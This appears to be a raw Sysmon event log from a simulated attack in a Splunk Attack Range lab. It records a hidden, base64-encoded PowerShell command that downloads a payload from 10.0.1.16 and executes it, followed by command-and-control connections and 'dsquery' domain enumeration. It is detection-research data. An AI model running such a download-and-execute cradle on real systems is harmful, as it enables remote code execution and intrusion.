18:15:53.796{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56721-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085380Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:30.585{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=368AD761CC89EE6279C6C5B7FFF43975,SHA256=C793C026B3D38EC317DCBF925EF68AF0221B3E90F9C76C3D880A27EB4E29B5EE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085379Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:54.064{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56723-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035085378Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:54.051{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56722-false10.0.1.12-8000- 23542300x800000000000000035085382Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:31.969{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF7183cf57.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085381Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:31.600{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C92435071DDE1DBE2DCA92E1C91A5182,SHA256=CBE353A3760E03FE22E5A21688997DBFB227F4B2EE89813A421DCDB8479C08C5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085383Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:32.631{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BBB438431AF23F6AF31F8B2CC8A9800,SHA256=398C85EE377489798513680561059C9DF9E40B8CD4D7743AEA5FA19D895AB2CC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085384Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:33.649{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E54248D541F3C7FA996EEA0EE5CA8385,SHA256=DD12E7E2210BC0C737F49DB6CE6E5D026FDA35B81289EEA4631730FEC1A350F2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085386Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:34.667{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2649DDF347249012769EF98F2B9888A4,SHA256=33AB13B1CDD5EF7AB8F8EF5523C3345803EC071788381C4495EA97B5482BFD1E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085385Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:34.149{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2765B8092A14A05C0EE51730D109E1B1,SHA256=BF7C6F90CE7FA943DADCD010F315F2F3DD4CAD1578873D098948EE52C5033B27,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085389Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:35.667{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9E7B3891B9CDC7BF021BF8901CD1A93,SHA256=CEA0D26E8D4E81A54390ACF98CC2282D25796BB1D3ECD93650590B11F87F81AA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085388Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:59.207{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56725-false10.0.1.12-8000- 354300x800000000000000035085387Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:59.093{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56724-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085391Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:36.682{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=472AB385D7BD90A2F2082C63D2F2802F,SHA256=374512296D6A603F6D0835B406DDF93D941040671F97F25F554E259DD1C5A782,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085390Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:36.429{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=4197F75818761DFB90D6FE55970C1AEF,SHA256=57641D6284C53C39D9B3B70E4C804A2708437BE06A8BDCC9F5987A1EF18391E1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085407Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:37.696{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F54766EBDB9D22325B061C888E186B95,SHA256=B229049C96D5115E09BA7268C6C7C44A2F8C03C5BEA222C80D6EF34EFD255647,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000035085406Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:37.150{B81B27B7-4F49-613A-6290-03000000C801}5304C:\Windows\System32\dsquery.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x800000000000000035085405Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:37.128{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4F49-613A-6290-03000000C801}5304C:\Windows\system32\dsquery.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085404Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:37.128{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4F49-613A-6290-03000000C801}5304C:\Windows\system32\dsquery.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085403Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:37.128{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4F49-613A-6290-03000000C801}5304C:\Windows\system32\dsquery.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085402Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:37.128{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4F49-613A-6290-03000000C801}5304C:\Windows\system32\dsquery.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085401Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:37.128{B81B27B7-4013-611D-1600-00000000C801}11967116C:\Windows\system32\svchost.exe{B81B27B7-4F49-613A-6290-03000000C801}5304C:\Windows\system32\dsquery.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085400Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:37.128{B81B27B7-4013-611D-1600-00000000C801}11961244C:\Windows\system32\svchost.exe{B81B27B7-4F49-613A-6290-03000000C801}5304C:\Windows\system32\dsquery.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085399Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:37.097{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-4F49-613A-6290-03000000C801}5304C:\Windows\system32\dsquery.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085398Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:37.097{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085397Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:37.097{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085396Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:37.097{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085395Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:37.097{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085394Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:37.097{B81B27B7-4130-611D-9D00-00000000C801}31603888C:\Windows\system32\csrss.exe{B81B27B7-4F49-613A-6290-03000000C801}5304C:\Windows\system32\dsquery.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085393Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:37.097{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-4F49-613A-6290-03000000C801}5304C:\Windows\system32\dsquery.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000035085392Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:37.103{B81B27B7-4F49-613A-6290-03000000C801}5304C:\Windows\System32\dsquery.exe10.0.14393.0 (rs1_release.160715-1616)Microsoft AD DS/LDS query command line utilityMicrosoft® Windows® Operating SystemMicrosoft Corporationdsquery.exe"C:\Windows\system32\dsquery.exe" computerC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=0F173F934D6FED9B140763559F70DF65,SHA256=3201CC050F642D0B3AD759EDCF57287082200831A258FBC2F17B4C96B53A28A7,IMPHASH=D442E29184F60B794AD2B7508D569FC3{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQATQBTAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQAwAC4AMAAuADEALgAxADYALwBiAGgALwBzAHkAbgBjAC8AYQBvAGwALwBfAHIAcAAnACkAKQApADsASQBFAFgAIAAkAE0AUwA= 23542300x800000000000000035085414Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:38.711{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17A9474A39CCB0D53C17A02A5DAAB865,SHA256=813BE83C56442BACB94269A096D27C1F0A0F453A1E57CF2D89E5D7B52DD7315F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085413Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:03.176{00000000-0000-0000-0000-000000000000}5304<unknown process>-tcptruefalse10.0.1.15win-host-987.attackrange.local56728-false10.0.1.14WIN-DC-128389ldap 354300x800000000000000035085412Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:03.168{00000000-0000-0000-0000-000000000000}5304<unknown process>-tcptruefalse10.0.1.15win-host-987.attackrange.local56727-false10.0.1.14WIN-DC-128389ldap 354300x800000000000000035085411Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:03.106{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56726-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085410Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:38.127{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 